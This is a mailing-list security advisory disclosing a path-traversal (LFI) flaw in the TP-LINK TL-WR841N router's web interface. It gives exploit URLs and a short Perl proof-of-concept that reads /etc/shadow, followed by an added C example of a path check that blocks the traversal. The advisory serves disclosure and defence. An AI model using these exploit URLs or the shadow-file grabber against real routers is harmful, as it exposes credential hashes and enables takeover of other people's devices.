List: full-disclosure
Subject: [Full-disclosure] =| Security Advisory - TP-LINK TL-WR841N LFI |=
From: "Matan Azugi" <pulse () sivanet ! co ! il>
Date: 2012-10-29 0:25:59
Message-ID: 003601cdb56b$f99879e0$ecc96da0$ () sivanet ! co ! il
=| Security Advisory - TP-LINK TL-WR841N LFI |=
Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
Firmware Version: 3.13.9 Build 120201 Rel.54965n and earlier versions
Discovered Date: 24/10/2012
Author: Matan Azugi [matan@madsec.co.il]
Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N
Details:
The TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion (LFI)
vulnerability.
The vulnerability exists in the web-based management interface. The URL parameter is not
properly sanitized before being used.
Exploitation URL:
<http://192.168.0.1/../../../../../../../etc/shadow>
http://192.168.0.1/help/../../../../../../../../etc/shadow
Successful exploitation allows viewing the router configuration and password
files.
Proof of Concept Code:
#TP-LINK TL-WR841N Shadow file grabber#
#built by Pulse matan@madsec.co.il#
#enjoy#
use LWP::UserAgent;
$host = $ARGV[0];
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
my $ua = LWP::UserAgent->new;
$ua->timeout(30);
$lfi = "/help/../../../../../../../../etc/shadow";
$url = $host.$lfi;
$request = HTTP::Request->new('GET', $url);
$response = $ua->request($request);
my $html = $response->content;
if($html =~ /root/) {
print "root$' \n" ;
}
Thank You,
Matan Azugi, MCSE OSCP
http://www.madsec.co.il
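
Added example, not part of the original advisory and not TP-LINK code: a C function showing the kind of path check the advisory says is missing, resolving a request path segment by segment and refusing any ".." that would climb above the web root. The function name resolve_under_root, the root "/web" and the file name index.htm are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not TP-LINK code): map an already percent-decoded
 * request path onto a file below web_root (no trailing slash).
 * Returns 0 and fills out, or -1 if the path would climb above web_root. */
int resolve_under_root(const char *web_root, const char *url_path,
                       char *out, size_t outlen)
{
    size_t root_len = strlen(web_root), len = root_len;
    const char *p = url_path;
    if (url_path[0] != '/' || root_len + 1 > outlen)
        return -1;
    memcpy(out, web_root, root_len + 1);

    while (*p) {
        while (*p == '/') p++;            /* collapse repeated slashes */
        size_t n = strcspn(p, "/");       /* length of the next segment */
        if (n == 0) break;
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (len == root_len)
                return -1;                /* ".." at the root: reject */
            while (out[len - 1] != '/')   /* drop the last segment */
                len--;
            out[--len] = '\0';
        } else if (!(n == 1 && p[0] == '.')) {
            if (len + n + 2 > outlen)
                return -1;                /* result would not fit */
            out[len++] = '/';
            memcpy(out + len, p, n);
            len += n;
            out[len] = '\0';
        }
        p += n;
    }
    return 0;
}

int main(void)
{
    char buf[128];
    /* Constructed inputs: the advisory's path and a harmless one. */
    const char *paths[] = { "/help/../../../../../../../../etc/shadow",
                            "/help/../index.htm" };
    for (int i = 0; i < 2; i++) {
        int rc = resolve_under_root("/web", paths[i], buf, sizeof buf);
        printf("%s -> %s\n", paths[i], rc == 0 ? buf : "rejected");
    }
    return 0;
}
```

The check only holds if it runs after percent-decoding, so that encoded dot segments are seen as "..". It does not follow symbolic links, which would need a separate check on the resolved file.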
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/